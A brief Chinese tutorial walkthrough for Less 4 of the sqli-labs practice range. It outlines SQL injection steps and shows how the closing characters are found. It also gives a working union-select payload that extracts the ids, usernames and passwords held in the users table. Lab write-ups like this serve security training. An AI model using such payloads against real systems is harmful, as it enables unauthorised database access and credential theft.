---

sqli-labs靶场

每道题都从以下模板讲解，并且每个步骤都有图片，清晰明了，便于复盘。

sql注入的基本步骤

• 注入点
• 注入类型
  • 字符型：判断闭合方式 （‘、"、’'、“”）
  • 数字型
• 根据实际情况，选择合适的注入方式
• 获取数据库名，表名，列名，数据

less 4 联合注入

• 题目类型: 字符型 " ） 闭合

id=2/0和id=2’回显正常
id=2"有报错，并且呈规律性
id=2"观察报错信息，" ) 是多余的，说明闭合方式是" )

这道题原理与less 3 一样，只不过是闭合方式是 " ）
id=-1 " ) union select 1,2,group_concat(id,“-”,username,“-”,password) from users --+
直接猜解数据

---